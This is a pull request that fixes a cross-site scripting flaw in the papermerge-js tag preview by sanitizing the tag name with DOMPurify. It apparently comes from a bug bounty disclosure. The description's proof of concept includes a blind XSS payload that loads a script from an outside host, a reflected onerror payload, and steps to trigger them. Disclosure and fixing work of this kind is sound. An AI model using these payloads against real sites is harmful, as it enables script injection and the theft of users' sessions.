### PR TITLE
XSS fix

### DIFF
--- a/package.json
+++ b/package.json
@@ -35,5 +35,8 @@
     "webpack-cli": "^3.3.12",
     "webpack-jquery-ui": "^2.0.1"
   },
-  "dependencies": {}
+   "dependencies": {
+    "dompurify": "^2.2.6",
+    "jsdom": "^16.4.0"
+  }
 }

--- a/src/js/views/tag_preview.js
+++ b/src/js/views/tag_preview.js
@@ -6,6 +6,10 @@ import Backbone from 'backbone';
 
 let TEMPLATE = require('../templates/tag_preview.html');
 let ENTER_KEY = 13;
+const createDOMPurify = require('dompurify');
+const { JSDOM } = require('jsdom');
+const window = new JSDOM('').window;
+const DOMPurify = createDOMPurify(window);
 
 
 export class TagPreviewView extends View {
@@ -55,7 +59,7 @@ export class TagPreviewView extends View {
   _set_name_change() {
      let el = document.getElementById("id_name");
      if (el) {
-       this.name = el.value;  
+       this.name = DOMPurify.sanitize(el.value);  
      } 
   }
 


### PR DESCRIPTION
### 📊 Metadata *

fixed xss during the rendering time

#### Bounty URL:https://www.huntr.dev/bounties/1-other-papermerge-js/

### ⚙️ Description *
Papermerge-js is the front end of papermerge DMS system
### 💻 Technical Description *
it was vulnerable due to unsanitized passage of tag name during real time rendering while creating a new tag
### 🐛 Proof of Concept (PoC) *
* XSS payloads Used for exploit :
  * blind xss payload : ```"><script src=https://copp.xss.ht></script> ``` **use your own blind payloads**
  * Reflected XSS payload : ```<img src=x onerror=alert(1337)>```

1. setup papermerge in your localhost 
2. move to http://127.0.0.1:8000/admin/tag/add/
3. put the payload in the Name field 
4. BOOM !! XSS triggered
![Screenshot from 2021-02-08 18-38-37](https://user-images.githubusercontent.com/43377443/107478975-634f1a80-6ba0-11eb-95f7-a002bd652f35.png)
### 🔥 Proof of Fix (PoF)
### 👍 User Acceptance Testing (UAT)

unsanitized passage of tag name has been sanitized using dompurify and jsdom.
# relates
https://github.com/418sec/netlify-cms/pull/1/files